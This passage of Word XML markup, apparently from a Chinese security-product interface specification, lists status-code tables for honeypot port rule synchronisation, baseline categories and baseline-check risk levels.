        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1331"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1040128B"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2E57AD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78A57BF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F919CFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="779B8BB1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05140B62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>verifyStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D055A82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="016E1801" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则同步中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="633A9721" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="254B0163" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>verifyStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4980EA30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71A50841" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>同步完毕</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59C4AE05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="615" w:name="_Toc115166380"/>
      <w:bookmarkStart w:id="616" w:name="网络蜜罐规则端口状态"/>
      <w:bookmarkEnd w:id="614"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>网络蜜罐规则端口状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="615"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="6128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="29D09134"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6954D845" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76F9C2D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66B43134" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E04BC59" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="415F2E4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B7FA1C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A6E216A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口删除规则进行中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4184161E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36BA57D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25C85462" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1159EA74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口新增规则同步行中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="50DB6C50" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03515CA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="635C781D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D78DDA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口规则同步成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0031E187" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD71899" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32D76FC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE75EF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口同步规则失败,原因：agent离线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03B888BC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14A59E56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30B7F5C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C5BAAEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口同步规则失败,原因：agent返回超时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C6F3B00" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596250D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BC418F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CFE221C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口同步规则失败,原因：agent停用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="168EE659" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32375CFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F76EFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F69BD44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口同步规则失败,原因：agent未返回对应端口信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="45389B90" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03279590" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20A175C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D2F28AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口同步规则失败,原因：服务端参数错误</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0CE0D52E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27B4C2FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CA988C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EF01EF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口同步规则失败,原因：系统错误(线程创建失败，内存分配失败等)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A020B04" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285F0B79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6147D88D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C4B90E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口同步规则失败,原因：agent已降级功能不能使用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B913F95" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B6D54EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C5FAB9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D47839F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口同步规则失败,原因：其他原因监听失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58AEE8B3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E410249" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F01651D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3390E506" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口同步规则失败,原因：其他原因监听失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49220CD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="617" w:name="_Toc115166381"/>
      <w:bookmarkStart w:id="618" w:name="基线类别"/>
      <w:bookmarkEnd w:id="616"/>
      <w:r>
        <w:t>基线类别</w:t>
      </w:r>
      <w:bookmarkEnd w:id="617"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="809"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="225FC005"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A5390F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32EC1231" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2582B4D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A4E535A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E565097" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="605E835A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24E1ED03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E4A845D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E04D34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CFEB5DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4293770A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BC4B36E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="619" w:name="_Toc115166382"/>
      <w:bookmarkStart w:id="620" w:name="基线检查风险级别"/>
      <w:bookmarkEnd w:id="618"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>基线检查风险级别</w:t>
      </w:r>
      <w:bookmarkEnd w:id="619"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="667"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F58E7E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4248663" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48444E85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F8513E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1980CD86" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00C61757" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A7A0679" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46572DB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>低风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E50A553" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D594892" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65420066" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30163088" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>中风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="78D3FFFA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56E34BC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68DED6F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47EA0BD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>该风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78101CB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
